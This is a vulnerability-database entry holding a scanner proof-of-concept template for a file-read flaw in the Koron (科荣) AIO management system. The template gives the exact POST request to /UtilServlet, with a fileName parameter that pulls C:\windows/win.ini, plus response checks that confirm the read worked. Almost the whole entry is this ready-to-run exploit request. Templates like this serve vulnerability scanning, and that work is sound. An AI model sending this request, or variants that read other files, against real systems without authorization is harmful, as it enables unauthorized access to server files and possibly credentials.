koron-aio-fileread: 科荣 AIO 管理系统存在文件读取

2025-08-01 科荣AIO管理系统 PoC Public

Description

科荣 AIO 管理系统存在文件读取

PoC

id: koron-aio-fileread

info:
  name: 科荣 AIO 管理系统存在文件读取
  author: zan8in
  severity: high
  verified: true
  description: |-
    科荣 AIO 管理系统存在文件读取
  tags: koron,fileread
  created: 2023/09/03

rules:
  r0:
    request:
      method: POST
      path: /UtilServlet
      body: |
        operation=readErrorExcel&fileName=C:\windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities